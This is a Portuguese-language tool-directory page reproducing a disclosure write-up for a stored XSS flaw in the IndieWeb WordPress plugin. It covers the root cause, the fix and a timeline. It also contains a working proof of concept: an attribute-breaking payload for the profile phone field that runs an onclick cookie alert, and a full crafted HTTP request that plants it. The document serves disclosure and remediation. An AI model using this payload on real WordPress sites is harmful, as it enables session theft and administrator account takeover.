Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/d3kc4rt1/cve-2025-14893
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

Cross-Site Scripting (XSS) Armazenado Autenticado no Plugin IndieWeb para WordPress

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14893: Cross-Site Scripting (XSS) Armazenado Autenticado no Plugin IndieWeb para WordPress

Aviso Legal: Este repositório foi criado apenas para fins educacionais e divulgação ética. A vulnerabilidade foi reportada de forma responsável ao fornecedor e corrigida. Não utilize estas informações para explorar sistemas sem a devida autorização.

Resumo Executivo

Uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado foi descoberta no plugin IndieWeb para WordPress (versões <= 4.0.5). Essa vulnerabilidade permite que atacantes autenticados com privilégios de Autor ou superiores injetem JavaScript malicioso no campo "Telefone" do perfil do usuário.

Quando o "Widget H-Card do Perfil do Autor" é exibido no front-end, o script injetado é renderizado sem sanitização adequada. Se um usuário altamente privilegiado, como um Administrador, clicar no link manipulado, o script será executado no contexto do navegador dele. Isso pode levar ao sequestro de sessão, ações administrativas não autorizadas e à completa Assunção de Conta (ATO).

Visão Geral da Vulnerabilidade

  • ID do CVE: CVE-2025-14893
  • Produto: IndieWeb (Plugin WordPress)
  • Versões Afetadas: <= 4.0.5
  • Tipo de Vulnerabilidade: Cross-Site Scripting (XSS) Armazenado (CWE-79)
  • Privilégios Necessários: Autenticado (nível Autor ou superior)

Análise Técnica Aprofundada e Causa Raiz

O problema central está no manuseio inseguro dos metadados do usuário no sistema de templates do plugin, especificamente na falha em usar as funções de escape integradas do WordPress.

Arquivo Vulnerável: templates/h-card.php (Linha 27)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

A Falha: O plugin produz diretamente os metadados tel do usuário dentro do atributo HTML href usando echo, sem envolvê-los em esc_attr(). Isso permite que um atacante forneça uma string manipulada que inclui uma aspa dupla (") para fechar prematuramente o atributo href, seguida por atributos HTML arbitrários (como style ou onclick).

Impacto no Negócio

  • Account Takeover (ATO): Se um Administrador interagir com o elemento manipulado, o JavaScript do atacante pode roubar cookies de sessão ou executar requisições AJAX administrativas, concedendo ao atacante controle total sobre o site WordPress.
  • Dano à Reputação: O atacante pode modificar elementos visíveis da página (desfiguração) ou redirecionar visitantes legítimos para sites maliciosos de terceiros.

Prova de Conceito (PoC)

Pré-requisitos

  1. WordPress instalado com o IndieWeb <= 4.0.5 ativado.
  2. Uma conta de atacante com o papel de Autor.
  3. O "Widget H-Card do Perfil do Autor" adicionado a uma área visível do front-end (ex.: Barra Lateral).

Etapas de Exploração

  1. Acesse o painel do WordPress como Autor.
  2. Navegue até Perfil (/wp-admin/profile.php).
  3. Role até o campo Telefone.
  4. Injete o seguinte payload (que rompe o atributo href):
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. Clique em Atualizar Perfil.
  6. Passo Crucial: Crie e publique um novo Post. O widget vulnerável só é renderizado em páginas de post único (is_single()) para exibir as informações do autor.
  7. Gatilho: Quando um Administrador visita o post publicado no front-end e clica no botão de telefone reformulado "Click_Me", o payload de XSS (que alerta o cookie da sessão) é executado.

Exemplo de Requisição HTTP Maliciosa (Atualização de Perfil)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

Remediação

Para corrigir esta vulnerabilidade, os desenvolvedores do plugin devem escapar corretamente a saída usando as funções esc_attr() e esc_html() do WordPress.

Exemplo de Código Corrigido:

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

Linha do Tempo

  • Data (2026-03-03): Relatado ao Wordfence.
  • Data (2026-03-20): Vulnerabilidade corrigida / Divulgação pública.

Referências e Créditos

  • Banco de Dados de Vulnerabilidades da Wordfence
  • CVE-2025-14893 no NVD
  • Plugin IndieWeb no WordPress.org
Baixar ferramenta